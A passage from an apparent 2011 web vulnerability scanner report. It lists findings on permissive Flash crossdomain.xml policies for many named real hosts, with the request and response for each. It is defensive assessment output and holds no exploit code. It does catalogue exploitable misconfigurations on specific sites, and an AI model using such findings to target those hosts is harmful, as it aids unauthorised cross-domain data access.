Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pix04.revsci.net

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:13:55 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<!-- allow Flash 7+ players to invoke JS from this server -->
<cross-domain-po
...[SNIP]...
<allow-access-from domain="*" secure="false"/>
...[SNIP]...

4.39. http://pixel.quantserve.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://pixel.quantserve.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: pixel.quantserve.com

Response

HTTP/1.0 200 OK
Connection: close
Cache-Control: private, no-transform, must-revalidate, max-age=86400
Expires: Wed, 15 Jun 2011 00:16:32 GMT
Content-Type: text/xml
Content-Length: 207
Date: Tue, 14 Jun 2011 00:16:32 GMT
Server: QS

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.40. http://puma.vizu.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://puma.vizu.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: puma.vizu.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:31 GMT
Server: PWS/1.7.2.3
X-Px: ms iad-agg-n23 ( iad-agg-n33), ht iad-agg-n33.panthercdn.com
ETag: "9c515-10d-8b2eaf40"
P3P: CP="DSP NID OTP UNR STP NON", policyref="/w3c/p3p.xml"
Cache-Control: max-age=604800
Expires: Fri, 17 Jun 2011 00:45:38 GMT
Age: 343973
Content-Length: 269
Content-Type: text/xml
Last-Modified: Thu, 09 Jun 2011 20:46:13 GMT
Connection: close

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-
...[SNIP]...

4.41. http://s.gravatar.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://s.gravatar.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: s.gravatar.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Content-Type: application/xml
Date: Tue, 14 Jun 2011 00:30:11 GMT
Last-Modified: Wed, 08 Sep 2010 18:32:05 GMT
Server: nginx
Content-Length: 261
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<site-control permitted-cross-domain-policies="master-only"
...[SNIP]...
<allow-access-from domain="*" />
...[SNIP]...

4.42. http://secure-us.imrworldwide.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://secure-us.imrworldwide.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: secure-us.imrworldwide.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:13:55 GMT
Server: Apache
Cache-Control: max-age=604800
Expires: Tue, 21 Jun 2011 00:13:55 GMT
Last-Modified: Wed, 14 May 2008 01:55:09 GMT
ETag: "10c-482a467d"
Accept-Ranges: bytes
Content-Length: 268
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*"/>
<site-control permi
...[SNIP]...

4.43. http://spd.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spd.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spd.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:13a5"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Tue, 14 Jun 2011 00:19:16 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.44. http://spe.atdmt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://spe.atdmt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: spe.atdmt.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Content-Length: 207
Allow: GET
Expires: Tue, 14 Jun 2011 20:13:55 GMT
Date: Mon, 13 Jun 2011 17:46:12 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-po
...[SNIP]...

4.45. http://speed.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://speed.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: speed.pointroll.com

Response

HTTP/1.0 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Tue, 06 Apr 2010 18:31:31 GMT
Accept-Ranges: bytes
ETag: "8e43ce60b7d5ca1:51d"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
X-Powered-By: ASP.NET
Date: Tue, 14 Jun 2011 00:19:17 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.46. http://static0.fluxstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static0.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static0.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273420
Date: Tue, 14 Jun 2011 00:27:53 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.47. http://static1.fluxstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static1.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static1.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273676
Date: Tue, 14 Jun 2011 00:20:23 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.48. http://static2.fluxstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static2.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static2.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273413
Date: Tue, 14 Jun 2011 00:28:00 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.49. http://static3.fluxstatic.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://static3.fluxstatic.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: static3.fluxstatic.com

Response

HTTP/1.0 200 OK
Content-Length: 183
Content-Type: text/xml
Last-Modified: Tue, 16 Nov 2010 08:32:46 GMT
Accept-Ranges: bytes
ETag: "3cae68d86885cb1:400"
Server: Microsoft-IIS/6.0
Server: s02s
Cache-Control: max-age=2273213
Date: Tue, 14 Jun 2011 00:28:06 GMT
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.50. http://t.flux.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.flux.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 07:10:47 GMT
Accept-Ranges: bytes
ETag: "b32e768a1819cc1:0"
Server: Microsoft-IIS/7.0
Server: w01r
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wt
Date: Tue, 14 Jun 2011 00:19:51 GMT
Connection: keep-alive
Content-Length: 247

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.51. http://t.pointroll.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://t.pointroll.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: t.pointroll.com

Response

HTTP/1.1 200 OK
Content-Length: 170
Content-Type: text/xml
Last-Modified: Wed, 29 Dec 2010 22:37:57 GMT
Accept-Ranges: bytes
ETag: "ef855aa9a7cb1:56f"
Server: Microsoft-IIS/6.0
P3P: CP="NOI DSP COR PSAo PSDo OUR BUS OTC"
Date: Mon, 13 Jun 2011 14:43:00 GMT
Connection: close

<?xml version="1.0"?>
<cross-domain-policy>
<allow-access-from domain="*" />
<allow-http-request-headers-from domain="*" headers="*"/>
</cross-domain-policy>

4.52. http://tcr.tynt.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://tcr.tynt.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: tcr.tynt.com

Response

HTTP/1.0 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=1800
Content-Type: text/xml
Date: Tue, 14 Jun 2011 00:13:56 GMT
ETag: "251523935"
Expires: Tue, 14 Jun 2011 00:43:56 GMT
Last-Modified: Tue, 10 Nov 2009 16:25:33 GMT
Server: EOS (lax001/54D7)
X-Cache: HIT
Content-Length: 201
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*" />
</cross-domain-policy>
...[SNIP]...

4.53. http://viamtv.112.2o7.net/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://viamtv.112.2o7.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: viamtv.112.2o7.net

Response

HTTP/1.1 200 OK
Date: Mon, 13 Jun 2011 17:45:09 GMT
Server: Omniture DC/2.0.0
xserver: www118
Connection: close
Content-Type: text/html

<cross-domain-policy>
<allow-access-from domain="*" secure="false" />
<allow-http-request-headers-from domain="*" headers="*" secure="false" />
</cross-domain-policy>

4.54. http://widgets.flux.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgets.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgets.flux.com

Response

HTTP/1.1 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 07:10:46 GMT
Accept-Ranges: bytes
ETag: "439786891819cc1:0"
Server: Microsoft-IIS/7.0
Server: w09g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Date: Tue, 14 Jun 2011 00:27:48 GMT
Connection: keep-alive
Content-Length: 247

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.55. http://widgetsak.flux.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://widgetsak.flux.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: widgetsak.flux.com

Response

HTTP/1.0 200 OK
Content-Type: text/xml
Last-Modified: Mon, 23 May 2011 08:22:36 GMT
ETag: "c593c6922219cc1:0"
Server: Microsoft-IIS/7.0
Server: w10g
P3P: CP="NON DSP COR ADM DEV PSA PSD IVA OUR BUS STA"
App: wg
Cteonnt-Length: 247
Cache-Control: max-age=600
Date: Tue, 14 Jun 2011 00:28:19 GMT
Content-Length: 247
Connection: close

...<?xml version="1.0" encoding="utf-8" ?>
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-only"/>
   <allow-access-from domain="*"/>
   <allow-http-request-headers-from d
...[SNIP]...

4.56. http://www.forexfactory.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.forexfactory.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.forexfactory.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 12:01:41 GMT
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Fri, 27 May 2011 19:47:06 GMT
ETag: "885e44-67-4a44733d3e280"
Accept-Ranges: bytes
Content-Length: 103
Connection: close
Content-Type: text/xml

<?xml version="1.0"?>
<cross-domain-policy>
   <allow-access-from domain="*" />
</cross-domain-policy>

4.57. http://www.mtv.com/crossdomain.xml

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mtv.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which allows access from any domain.

Allowing access from all domains means that any domain can perform two-way interaction with this application. Unless the application consists entirely of unprotected public content, this policy is likely to present a significant security risk.

Request

GET /crossdomain.xml HTTP/1.0
Host: www.mtv.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix) mod_jk/1.2.27
Last-Modified: Tue, 15 Apr 2008 20:18:17 GMT
ETag: "4b5484c-117-44aef19c7b440"
Accept-Ranges: bytes
Content-Length: 279
Content-Type: application/xml
Cache-Control: max-age=600
Date: Mon, 13 Jun 2011 17:45:32 GMT
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-access-from domain="*" secure="false" />
   <al
...[SNIP]...

4.58. http://ad.wsod.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://ad.wsod.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: ad.wsod.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Mon, 13 Jun 2011 14:11:24 GMT
Content-Type: text/xml
Connection: close
Last-Modified: Tue, 16 Feb 2010 21:38:42 GMT
ETag: "abe2fa-20a-47fbe8ebb5c80"
Accept-Ranges: bytes
Content-Length: 522
P3P: CP="CURa ADMa DEVa PSAo PSDo OUR BUS UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <allow-http-request-headers-from domain="*" headers="
...[SNIP]...
<allow-access-from domain="*.wsod.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wallst.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.wsodqa.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msn.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.msads.net" secure="false" />
...[SNIP]...

4.59. http://advertising.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://advertising.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: advertising.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:38 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Vary: Accept-Encoding
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

4.60. http://api.tweetmeme.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://api.tweetmeme.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: api.tweetmeme.com

Response

HTTP/1.1 200 OK
Server: nginx/0.7.67
Date: Tue, 14 Jun 2011 00:21:20 GMT
Content-Type: text/xml; charset='utf-8'
Connection: close
P3P: CP="CAO PSA"
Expires: Tue, 14 Jun 2011 00:22:51 +0000 GMT
Etag: 9830c9adda5d9776da5ef86599d624cb
X-Served-By: h02

<?xml version="1.0"?><!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd"><cross-domain-policy><allow-access-from domain="*.break.com" secure="true"/><allow-access-from domain="*.nextpt.com" secure="true"/>
...[SNIP]...

4.61. http://cm.mtv.overture.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://cm.mtv.overture.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: cm.mtv.overture.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:18:18 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Tue, 03 May 2011 10:14:38 GMT
Accept-Ranges: bytes
Content-Length: 639
Connection: close
Content-Type: application/xml

<?xml version="1.0" ?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="stage.mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="mce.media.yahoo.com" secure="false" />
...[SNIP]...
<allow-access-from domain="*.yahoo.com" />
<allow-access-from domain="*.broadcast.com" />
<allow-access-from domain="*.launch.com" />
<allow-access-from domain="*.hotjobs.com" />
<allow-access-from domain="*.yimg.com" />
<allow-access-from domain="*.yahooligans.com" />
<allow-access-from domain="*.overture.com" />
...[SNIP]...

4.62. http://feeds.bbci.co.uk/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://feeds.bbci.co.uk
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: feeds.bbci.co.uk

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Wed, 20 Apr 2011 09:07:59 GMT
Content-Type: text/xml
Cache-Control: max-age=120
Expires: Mon, 13 Jun 2011 14:47:54 GMT
Date: Mon, 13 Jun 2011 14:45:54 GMT
Content-Length: 1081
Connection: close

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy SYSTEM "http://www.adobe.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
   <site-control permitted-cross-domain-policies="master-o
...[SNIP]...
<allow-access-from domain="downloads.bbc.co.uk" />
   <allow-access-from domain="www.bbcamerica.com" />
   <allow-access-from domain="*.bbcamerica.com" />
   <allow-access-from domain="www.bbc.co.uk" />
   <allow-access-from domain="news.bbc.co.uk" />
   <allow-access-from domain="newsimg.bbc.co.uk"/>
   <allow-access-from domain="nolpreview11.newsonline.tc.nca.bbc.co.uk" />
   <allow-access-from domain="newsrss.bbc.co.uk" />
   <allow-access-from domain="newsapi.bbc.co.uk" />
   <allow-access-from domain="extdev.bbc.co.uk" />
   <allow-access-from domain="stats.bbc.co.uk" />
   <allow-access-from domain="*.bbc.co.uk"/>
   <allow-access-from domain="*.bbci.co.uk"/>
   <allow-access-from domain="*.bbc.com"/>
...[SNIP]...
<allow-access-from domain="jam.bbc.co.uk" />
   <allow-access-from domain="dc01.dc.bbc.co.uk" />
...[SNIP]...

4.63. http://geo.yahoo.com/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://geo.yahoo.com
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Request

GET /crossdomain.xml HTTP/1.0
Host: geo.yahoo.com

Response

HTTP/1.1 200 OK
Date: Tue, 14 Jun 2011 00:20:37 GMT
P3P: policyref="http://info.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE LOC GOV"
Last-Modified: Mon, 21 Aug 2006 16:30:13 GMT
Accept-Ranges: bytes
Content-Length: 228
Connection: close
Content-Type: application/xml

<?xml version="1.0"?>
<!DOCTYPE cross-domain-policy
SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="*.yahoo.com" secure="false" />
...[SNIP]...

4.64. http://googleads.g.doubleclick.net/crossdomain.xml

Summary

Severity:   Low
Confidence:   Certain
Host:   http://googleads.g.doubleclick.net
Path:   /crossdomain.xml

Issue detail

The application publishes a Flash cross-domain policy which uses a wildcard to specify allowed domains, and allows access from specific other domains.

Using a wildcard to specify allowed domains means that any domain matching the wildcard expression can perform two-way interaction with this application. You should only use this policy if you fully trust every possible web site that may reside on a domain which matches the wildcard expression.

Allowing access from specific domains means that web sites on those domains can perform two-way interaction with this application. You should only use this policy if you fully trust the specific domains allowed by the policy.

Request

GET /crossdomain.xml HTTP/1.0
Host: googleads.g.doubleclick.net

Response

HTTP/1.0 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/x-cross-domain-policy; charset=UTF-8
Last-Modified: Fri, 27 May 2011 17:28:41 GMT
Date: Mon, 13 Jun 2011 21:32:05 GMT
Expires: Tue, 14 Jun 2011 21:32:05 GMT
X-Content-Type-Options: nosniff
Server: cafe
X-XSS-Protection: 1; mode=block
Age: 9888
Cache-Control: public, max-age=86400

<?xml version="1.0"?>

<!DOCTYPE cross-domain-policy SYSTEM "http://www.macromedia.com/xml/dtds/cross-domain-policy.dtd">
<cross-domain-policy>
<allow-access-from domain="maps.gstatic.com" />
<allow-access-from domain="maps.gstatic.cn" />
<allow-access-from domain="*.googlesyndication.com" />
<allow-access-from domain="*.google.com" />
<allow-access-from domain="*.google.ae" />
<allow-access-from domain="*.google.at" />
<allow-access-from domain="*.google.be" />
<allow-access-from domain="*.google.ca" />
<allow-access-from domain="*.google.ch" />
<allow-access-from domain="*.google.cn" />
<allow-access-from domain="*.google.co.il" />
<allow-access-from domain="*.google.co.in" />
<allow-access-from domain="*.google.co.jp" />
<allow-access-from domain="*.google.co.kr" />
<allow-access-from domain="*.google.co.nz" />
<allow-access-from domain="*.google.co.uk" />
<allow-access-from domain="*.google.co.ve" />
<allow-access-from domain="*.google.co.za" />
<allow-access-from domain="*.google.com.ar" />
<allow-access-from domain="*.google.com.au" />
<allow-access-from domain="*.google.com.br" />
<allow-access-from domain="*.google.com.gr" />
